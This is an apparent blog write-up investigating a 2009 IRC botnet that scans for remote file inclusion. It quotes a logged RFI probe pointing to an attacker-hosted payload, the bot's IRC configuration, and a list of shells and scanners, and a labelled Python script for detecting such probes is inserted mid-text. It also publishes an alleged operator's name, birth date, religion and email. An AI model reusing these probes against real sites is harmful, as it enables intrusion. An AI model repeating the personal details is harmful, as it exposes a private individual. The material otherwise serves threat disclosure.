infobox.ru: Botnet

Your botnet is now my botnet.. infobox.ru.

• A visitor from srv002.infobox.ru (77.221.130.2) came on 2009-05-09 20:20:32. The browser was Mozilla/5.0
  ◦ This visitor first arrived without a referring URL and visited /index.php?page=zeus/index1.php?c=http://125.163.251.219/har/fx29id1.txt?? encountering a 404 error
  ◦ 1 seconds later, arrived without a referring URL, and visited /index.php?page=404-error

Because of those statistics on this website, I investigated the server and its IRC botnet a bit. My final result was tracing the IRC main bots (the ones responsible for the remote file inclusion) to the following servers (including their IRC name, source code file, version and info command):
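The stats entry above is what an RFI probe looks like in a web server log: a query parameter whose value is an absolute URL to a foreign host, here with the scanner's trailing "??". As an added example (not part of this write-up or the botnet's own code), the Python below flags such requests in Apache combined-format access logs; the log lines are constructed, with hypothetical sizes, referrers and time zone.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format log lines: the first mirrors the RFI
# probe from the stats above (hypothetical time zone, sizes and referrers);
# the other two are benign requests for comparison.
SAMPLE_LOG = """\
77.221.130.2 - - [09/May/2009:20:20:32 +0200] "GET /index.php?page=zeus/index1.php?c=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 512 "-" "Mozilla/5.0"
10.0.0.5 - - [09/May/2009:20:20:33 +0200] "GET /index.php?page=404-error HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.6 - - [09/May/2009:20:22:10 +0200] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://example.test/" "Mozilla/5.0"
"""

# Fields needed from the log line: client IP, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# An absolute URL inside a parameter value is the RFI signature: a vulnerable
# include() would fetch that file from the remote host instead of a local one.
REMOTE_URL_RE = re.compile(r'(?i)(?:https?|ftp)://[^\s&]+')


def find_rfi(line):
    """Return a finding for a request whose query embeds a remote URL, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        hit = REMOTE_URL_RE.search(value)
        if hit is None:
            continue
        remote = hit.group(0)
        return {
            "ip": m.group("ip"),
            "param": name,
            "remote_host": urlsplit(remote).hostname,
            "status": int(m.group("status")),
            # A trailing '??' is a common scanner habit: anything the vulnerable
            # script appends to the path ends up in the remote URL's query
            # string, so it is a useful extra indicator in the log.
            "double_qmark": remote.endswith("??"),
        }
    return None


def scan_log(text):
    """Run find_rfi over every line of a log and collect the findings."""
    return [f for f in (find_rfi(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 404 on such a request (as in the entry above) means the include did not resolve here, but the source IP and remote host are still worth blocking and reporting.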

Server              IRC nick          Source file         Version                     Info command
srv002.infobox.ru   ContinueScan      continuescan.txt    Continue RFI Scanner v5.2   .info
srv002.infobox.ru   ContinueScan[2]   continue2.txt       Continue RFI Scanner v5.2   .info
srv015.infobox.ru   ContinueScan[3]   continue3.txt       Continue RFI Scanner v5.2   .info
srv017.infobox.ru   [unknown bot]
srv018.infobox.ru   ContinueScan[1]   continue1.txt       Continue RFI Scanner v5.2   .info
srv018.infobox.ru   ContinueRFI[1]    continuerfi.txt                                 !info
srv018.infobox.ru   ContinueRFI[383]  continuerfi.txt                                 !info

When visiting their HTTP server (http://125.163.251.219/har/), where the included file is stored, you see the directory listing (due to an Apache misconfiguration). This means all files and folders on the server were visible and could be accessed. Reading through the source files and the whois information made it clear that the following person was responsible for the whole botnet ("the man behind"):

Nick : H4R
nama : harasin mokoginta
ttl : gorontalo,13 okteber 1987
kota : go-round-tallo
agama : islam
fs/e-mail : harasyeen_1320@yahoo.co.id
http://phlog.net/user/modero

The script botnet software on the server consisted of the following "programs":

  • RFI Scanner Bot v5.0
  • v6 Scanner
  • prendedor.pl v1.7
  • r57 Shell
  • FaTaLisTiCz_Fx Fx29Sh 3.2.12.08
  • and some minor scripts

The IRC channel used became clear from the following code in one of the scripts:

##[ IRC CONFIGURATION ]##
my @servers = ("irc.continuecrew.co.cc","90.150.144.50"); #IRC Servers (Separated by HaR)
my %bot = (
  nick => "ContinueScan[1]",
  ident => "Scanner",
  chan => ["#Continue"], #Channels to join (Separated by HaR)
  server => $servers[rand(scalar(@servers))], #one of the servers above, picked at random
  port => "6668"
);

Server   irc.continuecrew.co.cc
         90.150.144.50
Channel  #Continue
Port     6667 (previously)
         6668 (as of May 11, 2009)

These are the files stored on the server; all are scripts used for remote file inclusion. Here is a diff I made when they changed servers and set up the botnet:

Download the full report (pdf).

Last modified: 2 February 2010
